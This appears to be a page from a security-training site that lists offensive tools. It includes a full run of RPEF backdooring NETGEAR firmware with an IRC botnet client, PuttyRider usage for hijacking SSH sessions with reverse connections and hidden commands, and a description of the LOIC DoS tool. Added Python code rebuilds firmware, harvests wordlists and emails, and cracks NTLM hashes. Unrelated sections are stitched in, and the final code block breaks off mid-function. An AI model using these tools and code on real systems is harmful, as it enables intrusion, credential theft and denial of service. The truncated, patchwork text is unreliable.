Thủ Phủ Hacker Mũ Trắng Buôn Ma Thuột (The White-Hat Hacker Capital, Buôn Ma Thuột)

The Vietnam White-Hat Hacker training programme in Buôn Ma Thuột city, combined with a holiday. Arrive a newbie, leave a WHITE-HAT HACKER!

Hacking and Penetration Testing with Metasploit

Security365's training programme on using the Metasploit Framework for penetration testing (hacking).

C50 Computer Forensics Materials

Study materials on digital evidence investigation (CHFI), compiled by Security365 for training delivered at C50.

Students, Hacking and Information Security

A student hacking competition, with web-application attack challenges for students built on the Hackademic Challenge platform.

Attack and Defence with BackTrack / Kali Linux

An attack-and-defence course using the professional hacker toolkits BackTrack and Kali Linux, based on Offensive Security course content.


RPEF - Abstracts and expedites the process of backdooring stock firmware images for consumer/SOHO routers


Router Post-Exploitation Framework

Currently, the framework includes a number of firmware image modules, each marked with a status:

'Verified'   - This module is confirmed to work and is stable.
'Unverified' - This module is believed to work, or should work with little additional effort, but awaits testing on a physical device.
'Testing'    - This module is currently under development and is unstable for the time being. Users should consider it a "work in progress."
'Roadblock'  - Issues have halted progress on this module for the time being. Certain unavailable utilities or significant reverse engineering work may be necessary.

For a list of options, run:
./rpef.py -h
For a list of all currently supported firmware targets, run:
./rpef.py -ll

The script is written for Python 2.6 and may require the installation of a few modules. It is typically invoked as:
./rpef.py <firmware image> <output file> <payload>
and accepts a number of optional switches (see -h).

The rules/ directory stores a hierarchy of rules/<vendor>/<model>/ directories (for example rules/NETGEAR/WGR614v9_1.2.30NA/). One module corresponds to one firmware checksum rather than to one specific router, since multiple routers have been observed to run exactly the same firmware. Within each module, properties.json stores the language and order of operations needed to unpack, backdoor and repackage the target firmware image; the payloads/ directory stores cross-compiled binaries ready for deployment; and the optional dependencies/ directory stores miscellaneous files that aid the process.
The utilities/ directory stores pre-compiled x86 binaries for tasks such as packing/unpacking filesystems, compressing/decompressing data (where no suitable Python module exists) and calculating checksums.
The payloads_src/ directory stores the source code of the payloads themselves. All payloads are written from scratch to keep them as small as possible.

Usage

To verbosely generate a firmware image for the WGR614v9 backdoored with a botnet client, run:
./rpef.py WGR614v9-V1.2.30_41.0.44NA.chk WGR614v9-V1.2.30_41.0.44NA_botnet.chk botnet -v
And the process should proceed as follows:
$ ./rpef.py WGR614v9-V1.2.30_41.0.44NA.chk WGR614v9-V1.2.30_41.0.44NA_botnet.chk botnet -v
[+] Verifying checksum
Calculated checksum: 767c962037b32a5e800c3ff94a45e85e
Matched target: NETGEAR WGR614v9 1.2.30NA (Verified)
[+] Extracting parts from firmware image
Step 1: Extract WGR614v9-V1.2.30_41.0.44NA.chk, Offset 58, Size 456708 -> /tmp/tmpOaw1tn/headerkernel.bin
Step 2: Extract WGR614v9-V1.2.30_41.0.44NA.chk, Offset 456766, Size 1476831 -> /tmp/tmpOaw1tn/filesystem.bin
[+] Unpacking filesystem
Step 1: unsquashfs-1.0 /tmp/tmpOaw1tn/filesystem.bin -> /tmp/tmpOaw1tn/extracted_fs
Executing: utilities/unsquashfs-1.0 -dest /tmp/tmpOaw1tn/extracted_fs /tmp/tmpOaw1tn/filesystem.bin

created 217 files
created 27 directories
created 48 symlinks
created 0 devices
created 0 fifos
[+] Inserting payload
Step 1: Rm /tmp/tmpOaw1tn/extracted_fs/lib/modules/2.4.20/kernel/net/ipv4/opendns/openDNS_hijack.o
Step 2: Copy rules/NETGEAR/WGR614v9_1.2.30NA/payloads/botnet /tmp/tmpOaw1tn/extracted_fs/usr/sbin/botnet
Step 3: Move /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd.bak
Step 4: Touch /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 5: Appendtext "#!/bin/msh
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
[+] INPUT REQUIRED, IP address of IRC server: 1.2.3.4
[+] INPUT REQUIRED, Port of IRC server: 6667
[+] INPUT REQUIRED, Channel to join (include #): #hax
[+] INPUT REQUIRED, Prefix of bot nick: toteawesome
Step 6: Appendtext "/usr/sbin/botnet 1.2.3.4 6667 \#hax toteawesome &
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 7: Appendtext "/usr/sbin/httpd.bak
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 8: Chmod 777 /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
[+] Building filesystem
Step 1: mksquashfs-2.1 /tmp/tmpOaw1tn/extracted_fs, Blocksize 65536, Little endian -> /tmp/tmpOaw1tn/newfs.bin
Executing: utilities/mksquashfs-2.1 /tmp/tmpOaw1tn/extracted_fs /tmp/tmpOaw1tn/newfs.bin -b 65536 -root-owned -le
Creating little endian 2.1 filesystem on /tmp/tmpOaw1tn/newfs.bin, block size 65536.

Little endian filesystem, data block size 65536, compressed data, compressed metadata, compressed fragments
Filesystem size 1442.99 Kbytes (1.41 Mbytes)
29.38% of uncompressed filesystem size (4912.18 Kbytes)
Inode table size 2245 bytes (2.19 Kbytes)
33.63% of uncompressed inode table size (6675 bytes)
Directory table size 2322 bytes (2.27 Kbytes)
55.26% of uncompressed directory table size (4202 bytes)
Number of duplicate files found 3
Number of inodes 293
Number of files 218
Number of fragments 22
Number of symbolic links 48
Number of device nodes 0
Number of fifo nodes 0
Number of socket nodes 0
Number of directories 27
Number of uids 1
root (0)
Number of gids 0
[+] Gluing parts together
Step 1: Touch WGR614v9-V1.2.30_41.0.44NA_botnet.chk
Step 2: Appendfile /tmp/tmpOaw1tn/headerkernel.bin >> WGR614v9-V1.2.30_41.0.44NA_botnet.chk
Step 3: Appendfile /tmp/tmpOaw1tn/newfs.bin >> WGR614v9-V1.2.30_41.0.44NA_botnet.chk
[+] Padding image with null bytes
Step 1: Pad WGR614v9-V1.2.30_41.0.44NA_botnet.chk to size 1937408 with 0 (0x00)
[+] Generating CHK header
Step 1: packet WGR614v9-V1.2.30_41.0.44NA_botnet.chk rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/compatible_NA.txt rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/ambitCfg.h
Executing: utilities/packet -k WGR614v9-V1.2.30_41.0.44NA_botnet.chk -b rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/compatible_NA.txt -i rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/ambitCfg.h
[+] Removing temporary files
Step 1: Rmdir /tmp/tmpOaw1tn/
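The transcript above is the whole pipeline: match the image by md5, carve the header+kernel and the squashfs out at fixed offsets, unpack, swap httpd for a shell wrapper that backgrounds the payload and then runs the renamed original, repack, glue, pad to the flash size and add the CHK header. The following is an added example, not code from RPEF, that reproduces the carve, wrap, glue and pad steps in Python over a constructed image. The offsets, sizes, "rules" table, pad size and image bytes are all made up; the unsquashfs/mksquashfs and CHK-header steps are left out because they need the vendor utilities.

```python
"""Added example, not code from RPEF: the carve / wrap / glue / pad steps shown in
the transcript above, reduced to plain Python over a constructed image. The offsets,
sizes, md5 "rules" table, pad size and image bytes below are all made up."""
import hashlib

# Constructed stand-ins for headerkernel.bin and filesystem.bin. A real .chk carries
# a 58-byte header, the kernel, then a squashfs image at the offsets its module lists.
HEADER_LEN = 58
FAKE_KERNEL = b"K" * 100
FAKE_FS = b"hsqs" + b"F" * 200        # "hsqs" is the little-endian squashfs magic
FAKE_IMAGE = b"\x00" * HEADER_LEN + FAKE_KERNEL + FAKE_FS

# Modules are keyed by firmware md5 (one module per checksum, not per router model).
RULES = {
    hashlib.md5(FAKE_IMAGE).hexdigest(): {
        "name": "CONSTRUCTED vendor/model",
        "status": "Testing",
        "headerkernel": (0, HEADER_LEN + len(FAKE_KERNEL)),             # offset, size
        "filesystem": (HEADER_LEN + len(FAKE_KERNEL), len(FAKE_FS)),    # offset, size
        "pad_to": 512,
    }
}

def identify(image: bytes):
    """'Verifying checksum': look the image's md5 up in the rules table."""
    return RULES.get(hashlib.md5(image).hexdigest())

def carve(image: bytes, offset: int, size: int) -> bytes:
    """'Extract ..., Offset N, Size M': cut one part out of the image."""
    if offset + size > len(image):
        raise ValueError("region runs past the end of the image")
    return image[offset:offset + size]

def wrapper_script(payload_cmd: str, original: str, shell: str = "/bin/msh") -> str:
    """Build the script that replaces httpd: background the payload, then run the
    renamed original binary so the router's web UI keeps working."""
    return f"#!{shell}\n{payload_cmd} &\n{original}\n"

def glue_and_pad(parts, pad_to: int, fill: bytes = b"\x00") -> bytes:
    """'Gluing parts together' + 'Padding image': concatenate, then pad to pad_to."""
    out = b"".join(parts)
    if len(out) > pad_to:
        raise ValueError("rebuilt image is larger than the target size")
    return out + fill * (pad_to - len(out))

def rebuild(image: bytes, new_fs: bytes) -> bytes:
    """Whole pipeline minus the unsquashfs/mksquashfs and CHK-header steps, which
    need the vendor utilities: identify, carve the header+kernel, glue, pad."""
    rule = identify(image)
    if rule is None:
        raise LookupError("unknown firmware checksum: no module for this image")
    off, size = rule["headerkernel"]
    return glue_and_pad([carve(image, off, size), new_fs], rule["pad_to"])

if __name__ == "__main__":
    modified_fs = FAKE_FS.replace(b"F" * 8, b"BACKDOOR", 1)   # stands in for the repacked squashfs
    image = rebuild(FAKE_IMAGE, modified_fs)
    print(identify(FAKE_IMAGE)["name"], len(image), "bytes")
    print(wrapper_script("/usr/sbin/botnet 1.2.3.4 6667 \\#hax toteawesome", "/usr/sbin/httpd.bak"))
```

The checksum lookup is the only gate: an image whose md5 is not in the table is refused rather than processed with guessed offsets, which is the same reason the real framework keys modules on the firmware checksum.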


USBPcap - USB Packet capture for Windows (open-source USB Sniffer for Windows)


USBPcap is an open-source USB sniffer for Windows.


CeWL - Custom WordList Generator Tool for Password Cracking

CeWL is a Ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be fed to password crackers such as John the Ripper.

CeWL also has an associated command line app, FAB (Files Already Bagged), which uses the same metadata extraction techniques to create author/creator lists from already downloaded files.

Usage
cewl [OPTION] ... URL
--help, -h
Show help
--depth x, -d x
The depth to spider to, default 2
--min_word_length, -m
The minimum word length; strips out all words under the specified length, default 3
--offsite, -o
By default, the spider will only visit the site specified. With this option it will also visit external sites
--write, -w file
Write the output to the file rather than to stdout
--ua, -u user-agent
Change the user agent
--no-words, -n
Don't output the wordlist
--meta, -a file
Include meta data, optional output file
--email, -e file
Include email addresses, optional output file
--meta_file file
Filename for metadata output
--email_file file
Filename for email output
--meta-temp-dir directory
The directory used by exiftool when parsing files, the default is /tmp
--count, -c
Show the count for each of the words found
--auth_type
Digest or basic
--auth_user
Authentication username
--auth_pass
Authentication password
--proxy_host
Proxy host
--proxy_port
Proxy port, default 8080
--proxy_username
Username for proxy, if required
--proxy_password
Password for proxy, if required
--verbose, -v
Verbose, show debug and extra output
URL
The site to spider.
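The options above describe what CeWL does with each page it fetches: strip the markup, keep words of at least --min_word_length characters, pick up alt/title text (version 4), collect e-mail addresses (--email) and optionally sort by count (--count). The following is an added example, not CeWL's code, that runs exactly that harvesting step offline over one constructed HTML document, so the spidering and the network are left out and only the extraction logic is shown.

```python
"""Added example, not CeWL's code: the word-harvesting core that CeWL applies to each
spidered page, run offline over a constructed HTML document. It strips tags and script
bodies, keeps words of at least min_word_length characters, pulls text from alt/title
attributes, collects e-mail addresses, and sorts by count as --count does."""
import re
from collections import Counter
from html.parser import HTMLParser

# Constructed sample page; nothing is fetched from the network.
SAMPLE_HTML = """<html><head><title>Acme Widgets</title>
<script>var secret = "notaword";</script></head>
<body><h1>Acme Widgets Ltd</h1>
<p>Contact Jane Doe at jane.doe@acme.example or sales@acme.example.</p>
<img src="logo.png" alt="Acme factory Springfield" title="Springfield plant">
<p>Acme, founded 1962, ships widgets worldwide.</p></body></html>"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
WORD_RE = re.compile(r"[A-Za-z][A-Za-z0-9'-]*")   # tokens that start with a letter

class _TextExtractor(HTMLParser):
    """Collect visible text plus alt/title attribute values; skip script/style bodies."""
    def __init__(self):
        super().__init__()
        self.chunks, self._skip = [], 0
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        for name, value in attrs:
            if name in ("alt", "title") and value:
                self.chunks.append(value)
    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1
    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)

def extract_text(html: str) -> str:
    p = _TextExtractor()
    p.feed(html)
    p.close()
    return " ".join(p.chunks)

def harvest_words(html: str, min_word_length: int = 3) -> Counter:
    """word -> count for words of at least min_word_length characters (case-sensitive)."""
    text = EMAIL_RE.sub(" ", extract_text(html))   # keep e-mail fragments out of the wordlist
    return Counter(w for w in WORD_RE.findall(text) if len(w) >= min_word_length)

def harvest_emails(html: str) -> set:
    """The --email output: every address found in the raw page."""
    return set(EMAIL_RE.findall(html))

def wordlist(html: str, min_word_length: int = 3, by_count: bool = True) -> list:
    counts = harvest_words(html, min_word_length)
    if by_count:          # most frequent first, as with --count in CeWL 4.3
        return [w for w, _ in counts.most_common()]
    return sorted(counts)

if __name__ == "__main__":
    for w, n in harvest_words(SAMPLE_HTML).most_common():
        print(f"{w}: {n}")
    print(sorted(harvest_emails(SAMPLE_HTML)))
```

Script bodies are skipped on purpose: JavaScript identifiers inflate a wordlist with tokens that were never shown to a user, so they are poor password candidates. Case is kept as found, which is what you want when the list feeds a rule-based cracker that will add its own case permutations.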


Change Log
Keeping track of history.
  • Version 4.3 - Various spider bug fixes and the introduction of the sorting the results by count
  • Version 4.2 - Fixed the Spider gem by overriding the function, also handling #name links correctly
  • Version 4.1 - Small bug fixes and added new parameter to set filenames for email and metadata output
  • Version 4 - Runs with Ruby 1.9.x and grabs text out of alt and title tags
  • Version 3 - Now spiders pages referenced in JavaScript location commands
  • Version 2.2 - Data from email addresses and meta data can be written to their own files
  • Version 2.1 - Fixed a bug some people were having while using the email option
  • Version 2 - Added meta data support
  • Version 1 - released

John the Ripper 1.8.0-jumbo-1 - Fast Password Cracker


John the Ripper is a free password cracking software tool. Initially developed for the Unix operating system, it now runs on fifteen different platforms (eleven of which are architecture-specific versions of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix versions (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL, and others.

John the Ripper 1.8.0-jumbo-1 is based on today’s code from the bleeding-jumbo branch on GitHub, which we’ve tried to make somewhat stable lately in preparation for this release.

You may notice that the source code archive size has increased from under 2 MB to over 20 MB. This is primarily due to the included .chr files, which are both bigger and more numerous than pre-1.8 ones. There are lots of source code additions, too.

In fact:

This is probably the biggest single jumbo update so far. The changes are too numerous to summarize – unfortunately, we haven't been doing that during development, and it'd be a substantial effort to do it now, delaying the release to next year. So we chose to go ahead and release whatever we've got. (Of course, there are the many commit messages, but that's not a summary.)

A really brief summary, though, is that there are new "formats" (meaning more supported hash and "non-hash" types, both on CPU and on GPU), various enhancements to existing ones, mask mode, better support for non-ASCII character sets, and of course all of 1.8.0's features (including --fork and --node). And new bugs. Oh, and we're now using autoconf, meaning that you need to "./configure" and "make", with all the usual pros and cons of this approach. There's a Makefile.legacy included, so you may "make -f Makefile.legacy" to try and build JtR the old way if you refuse to use autoconf… for now… and this _might_ even work… but you'd better bite the bullet. (BTW, I have no current plans on autoconf'ing non-jumbo versions of JtR.)

Due to autoconf, things such as OpenMP and OpenCL are now enabled automatically (if system support for them is detected during build). When this is undesirable, you may use e.g. "./configure --disable-openmp" or "./configure --disable-openmp-for-fast-formats" and run with --fork to achieve a higher cumulative c/s rate across the fork'ed processes.

Out of over 4800 commits since 1.7.9-jumbo-7, over 2600 are by magnum, making him the top contributor. Other prolific contributors are JimF, Dhiru Kholia, Claudio Andre, Frank Dittrich, Sayantan Datta.

There are also multiple commits by (or attributed to) Lukas Odzioba, ShaneQful, Alexander Cherepanov, rofl0r, bwall, Narendra Kangralkar, Tavis Ormandy, Spiros Fraganastasis, Harrison Neal, Vlatko Kosturjak, Aleksey Cherepanov, Jeremi Gosney, junmuz, Thiebaud Weksteen, Sanju Kholia, Michael Samuel, Deepika Dutta, Costin Enache, Nicolas Collignon, Michael Ledford. There are single commits by (or attributed to) many other contributors as well (including even one by atom of hashcat).


PuttyRider - Hijack Putty sessions in order to sniff conversation and inject Linux commands


PuttyRider injects a DLL into a running putty.exe process in order to sniff all communication and inject Linux commands on the remote server.

This can be useful in an internal penetration test when you already have access to a sysadmin's machine on which a PuTTY session to a Linux server is open. You can use PuttyRider to take control of the remote server through the existing, already authenticated SSH session.

The tool was recently presented at DefCamp 2014, a security conference in Romania.


Examples 
List existing Putty processes and their status (injected / not injected)
PuttyRider.exe -l
Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.
PuttyRider.exe -w -f
Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)
PuttyRider.exe -x

Usage
Operation modes:
-l List the running Putty processes and their connections
-w Inject in all existing Putty sessions and wait for new sessions
to inject in those also
-p PID Inject only in existing Putty session identified by PID.
If PID==0, inject in the first Putty found
-x Cleanup. Remove the DLL from all running Putty instances
-d Debug mode. Only works with -p mode
-c CMD Automatically execute a Linux command after successful injection
PuttyRider will remove trailing spaces and '&' character from CMD
PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD
-h Print this help

Output modes:
-f Write all Putty conversation to a file in the local directory.
The filename will have the PID of current putty.exe appended
-r IP:PORT Initiate a reverse connection to the specified machine and
start an interactive session.

Interactive commands (after you receive a reverse connection):
!status See if the Putty window is connected to user input
!discon Disconnect the main Putty window so it won't display anything
This is useful to send commands without the user to notice
!recon Reconnect the Putty window to its normal operation mode
CMD Linux shell commands
!exit Terminate this connection
!help Display help for client connection


Windows Password Kracker - Free Windows Password Recovery Software



Windows Password Kracker is a free tool to recover a lost or forgotten Windows password. It can quickly recover the original Windows password from either an LM (LAN Manager) or an NTLM (NT LAN Manager) hash.

Windows does not store the logon password itself; it stores an LM or NTLM hash of it. Since these are one-way hash functions, the hash cannot be decrypted to get the password back. In such cases 'Windows Password Kracker' can recover the password by a simple dictionary attack: hash each candidate word and compare it with the stored hash.

Before that you need to dump the password hashes from the live or remote Windows system using a pwdump tool. Then feed the hash (LM or NTLM) for the corresponding user into 'Windows Password Kracker' to recover that user's password.

In forensic scenarios, an investigator can dump the hashes from the live or offline system and then crack them with 'Windows Password Kracker' to recover the original password. This matters because the recovered password can then be used to decrypt stored credentials as well as encrypted volumes on that system.

'Windows Password Kracker' uses the simple and fast dictionary-based recovery technique. By default it ships with a sample password file; larger password dictionaries (wordlists) are widely available online. Two points worth knowing when choosing what to crack: the LM hash upper-cases the password and splits it into two independent 7-character halves, so it falls far faster than NTLM and should be attacked first whenever it is present; NTLM is an unsalted MD4 over the UTF-16LE password, so identical passwords yield identical hashes across accounts and systems.

Though it supports only the dictionary method, you can easily use tools like Crunch or Cupp to generate brute-force or custom password list files and then use them with 'Windows Password Kracker'.

It works on both 32-bit and 64-bit Windows systems from Windows XP to Windows 8.
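To make the dictionary attack on an NTLM hash concrete, here is an added example that is not Windows Password Kracker's code. It parses a constructed pwdump-style line, recognises the well-known LM hash of the empty string (which means LM is disabled or the password is blank), and hashes each wordlist candidate with NTLM, which is MD4 over the UTF-16LE password. A small pure-Python MD4 (RFC 1320) is included because hashlib's md4 is missing on many OpenSSL 3 builds; the NTLM value in the sample line is the well-known hash of "password".

```python
"""Added example, not Windows Password Kracker's code: what a dictionary attack on a
pwdump-style NTLM hash actually does. NTLM is MD4 over the UTF-16LE password, so a
small pure-Python MD4 (RFC 1320) is included, since hashlib's md4 is missing on many
OpenSSL 3 builds. The pwdump lines and the wordlist are constructed; the NTLM value in
them is the well-known hash of "password"."""
import struct

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (   # (function, additive constant, shifts, X-word order) per RFC 1320
        (F, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + fn(b, c, d) + X[idx] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c                 # rotate the register roles
        h = [(v + w) & 0xFFFFFFFF for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def ntlm_hash(password: str) -> str:
    """NTLM = MD4(UTF-16LE(password)); no salt, so equal passwords give equal hashes."""
    return md4(password.encode("utf-16-le")).hex()

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "": LM disabled or blank password

def parse_pwdump(line: str) -> dict:
    """pwdump line format: user:RID:LMhash:NTLMhash:::"""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
            "lm_present": lm.lower() != EMPTY_LM}

def dictionary_crack(nt_hex: str, wordlist):
    """Hash every candidate and compare; returns the password or None."""
    target = nt_hex.lower()
    for word in wordlist:
        word = word.rstrip("\r\n")
        if ntlm_hash(word) == target:
            return word
    return None

# Constructed pwdump output and wordlist. Both accounts carry the same NTLM hash.
SAMPLE_DUMP = ["Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
               "svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::"]
SAMPLE_WORDLIST = ["letmein", "Password", "password", "123456"]

def crack_dump(lines, wordlist):
    """Crack each record; identical NTLM hashes fall together because NTLM is unsalted."""
    out = {}
    for line in lines:
        rec = parse_pwdump(line)
        out[rec["user"]] = dictionary_crack(rec["nt"], wordlist)
    return out

if __name__ == "__main__":
    for user, pw in crack_dump(SAMPLE_DUMP, SAMPLE_WORDLIST).items():
        print(f"{user}: {pw!r}")
```

Note that "Password" is tried before "password" and does not match: NTLM is case-sensitive, unlike LM, which is why an LM hash, when present, is the cheaper target.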


Snort 3.0 - Network intrusion prevention and detection system (IDS/IPS)


Snort is the most powerful IPS in the world, setting the standard for intrusion detection. So when we started thinking about what the next generation of IPS looked like we started from scratch.

Features
  • Support multiple packet processing threads
  • Shared configuration and attribute table
  • Use a simple, scriptable configuration
  • Make key components pluggable
  • Autodetect services for portless configuration
  • Support sticky buffers in rules
  • Autogenerate reference documentation
  • Provide better cross platform support

LOIC 1.0.8 (Low Orbit Ion Cannon) - A network stress testing application


Low Orbit Ion Cannon (LOIC) is an open source network stress testing and denial-of-service attack application, written in C#. LOIC was initially developed by Praetox Technologies, but was later released into the public domain, and now is hosted on several open source platforms.

LOIC performs a denial-of-service (DoS) attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets. The software inspired the creation of an independent JavaScript version called JS LOIC, as well as LOIC-derived web version called Low Orbit Web Cannon. These enable a DoS from a web browser.


Android Studio - The official Android IDE


Android Studio is the official IDE for Android application development, based on IntelliJ IDEA. On top of the capabilities you expect from IntelliJ, Android Studio offers:
  • Flexible Gradle-based build system
  • Build variants and multiple apk file generation
  • Code templates to help you build common app features
  • Rich layout editor with support for drag and drop theme editing
  • Lint tools to catch performance, usability, version compatibility, and other problems
  • ProGuard and app-signing capabilities
  • Built-in support for Google Cloud Platform, making it easy to integrate Google Cloud Messaging and App Engine
  • And much more

Intelligent code editor
At the core of Android Studio is an intelligent code editor capable of advanced code completion, refactoring, and code analysis.
The powerful code editor helps you be a more productive Android app developer.

Code templates and GitHub integration
New project wizards make it easier than ever to start a new project.
Start projects using template code for patterns such as navigation drawer and view pagers, and even import Google code samples from GitHub.

Multi-screen app development
Build apps for Android phones, tablets, Android Wear, Android TV, Android Auto and Google Glass.
With the new Android Project View and module support in Android Studio, it's easier to manage app projects and resources.

Virtual devices for all shapes and sizes
Android Studio comes pre-configured with an optimized emulator image.
The updated and streamlined Virtual Device Manager provides pre-defined device profiles for common Android devices.

Android builds evolved, with Gradle
Create multiple APKs for your Android app with different features using the same project.
Manage app dependencies with Maven.
Build APKs from Android Studio or the command line.


THC-SmartBrute - Finds undocumented and secret commands implemented in a smartcard


This tool finds undocumented and secret commands implemented in a smartcard. An instruction (APDU) is divided into a class byte (CLA), an instruction number (INS) and the parameters or arguments P1, P2 and P3. THC-SMARTBRUTE iterates through all possible values of CLA and INS to find the valid combinations.

Furthermore, it tries to find out which parameters are valid for a given class and instruction number.

Requirements

You need a PC/SC compatible smartcard reader that is supported by the PCSC-LITE library.
A list of supported devices is published by the PCSC-LITE project.
THC-SMARTBRUTE was developed with the XXX smartcard reader.

Command line arguments
--verbose
prints a lot of debugging messages to stderr *FIXME*
--undoconly
only prints a found instruction if it is not an element of the standard instruction list
--fastresults
before iterating through all possible combinations of class and instruction number, typical class/instruction values are checked for availability. After that the classes 0x00, 0x80 and 0xA0 (GSM) are tried first.
--help
prints out the usage
--chv1 pin1
a VERIFY CHV1 instruction with pin1 as argument is executed
--chv2 pin2
a VERIFY CHV2 instruction with pin2 as argument is executed
--brutep1p2
finds valid parameter p1 and p2 combinations for the instruction the user defined with --cla and --ins. For parameter p1 the value 0x00 is assumed.
--brutep3
finds valid p3 values for the given --cla, --ins, --p1 and --p2
--cla CLASS
sets the instruction class to CLASS
--ins INS
sets the instruction number to INS
--p1 P1
sets parameter p1 to P1
--p2 P2
sets parameter p2 to P2
--p3 P3
sets parameter p3 to P3

Examples
1. ~$ ./thc-smartbrute
run thcsmartbrute without any arguments to brute force for valid instructions
2. ~$ ./thc-smartbrute --undoconly
find valid instructions but only print out non-standard instructions

3. ~$ ./thc-smartbrute --cla 0xA0 --ins 0xA4 --brutep1p2
find the first two arguments for the GSM instruction SELECT FILE

4. ~$ ./thc-smartbrute --cla 0xA0 --ins 0xA4 --p1 0x00 --p2 0x00 --brutep3
find the 3rd argument for the already found first two arguments
for the GSM instruction SELECT FILE
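What drives the sweep is the status word the card returns: under ISO 7816-4, 6E00 means the class is not supported, 6D00 means the instruction is not supported, 6A86 means P1/P2 are wrong, and any other answer means the card recognised the command. The following is an added example, not THC-SmartBrute's code, that runs the CLA/INS sweep, the --undoconly filter and a P1/P2 sweep against a constructed software "card" so it needs no reader. The card's command table, its single undocumented vendor command (CLA 0x80, INS 0xF0) and the set of "standard" INS values are made up or abridged for the example; the P1/P2 sweep iterates both parameters rather than fixing P1 at 0x00 as the tool does.

```python
"""Added example, not THC-SmartBrute's code: the CLA/INS sweep and a P1/P2 sweep the
tool performs, run against a constructed software "card" so it needs no reader. ISO
7816-4 status words drive the classification: 6E00 = class not supported, 6D00 =
instruction not supported, 6A86 = incorrect P1-P2; anything else means the card
recognised the command. The card's command table below is made up."""

# Constructed card: a few documented commands plus one undocumented vendor command.
FAKE_CARD_TABLE = {           # (CLA, INS) -> status word once CLA/INS/P1/P2 are accepted
    (0x00, 0xA4): 0x6A86,     # SELECT FILE, present but rejects every P1/P2 we send
    (0x00, 0xB0): 0x6982,     # READ BINARY, "security status not satisfied"
    (0x00, 0x20): 0x63C3,     # VERIFY, wrong PIN, 3 tries left
    (0xA0, 0xA4): 0x9000,     # GSM SELECT FILE
    (0x80, 0xF0): 0x9000,     # undocumented vendor command on the proprietary class
}
FAKE_CLASSES = {cla for cla, _ in FAKE_CARD_TABLE}
PARAM_OK = {(0xA0, 0xA4): {(0x00, 0x00)}}   # this GSM SELECT accepts only P1=P2=0

def fake_transmit(apdu: bytes) -> int:
    """Answer a 5-byte APDU header the way a card would; returns the status word."""
    cla, ins, p1, p2 = apdu[0], apdu[1], apdu[2], apdu[3]
    if cla not in FAKE_CLASSES:
        return 0x6E00
    if (cla, ins) not in FAKE_CARD_TABLE:
        return 0x6D00
    if (cla, ins) in PARAM_OK and (p1, p2) not in PARAM_OK[(cla, ins)]:
        return 0x6A86
    return FAKE_CARD_TABLE[(cla, ins)]

# Abridged set of INS values defined by ISO 7816-4 / GSM 11.11, for --undoconly filtering.
STANDARD_INS = {0x0E, 0x20, 0x24, 0x26, 0x28, 0x2C, 0x32, 0x44, 0x82, 0x84, 0x88,
                0xA2, 0xA4, 0xB0, 0xB2, 0xC0, 0xCA, 0xD0, 0xD6, 0xDA, 0xDC, 0xE2, 0xF2, 0xFA}
PROBE_INS = 0xA4       # SELECT exists on nearly every card: a good reference for class probing
FAST_CLASSES = (0x00, 0x80, 0xA0)

def live_classes(transmit, fast=True):
    """Classes the card does not reject with 6E00; with fast=True the common ones go first.
    Heuristic: a class counts as live if any answer other than 6E00 comes back."""
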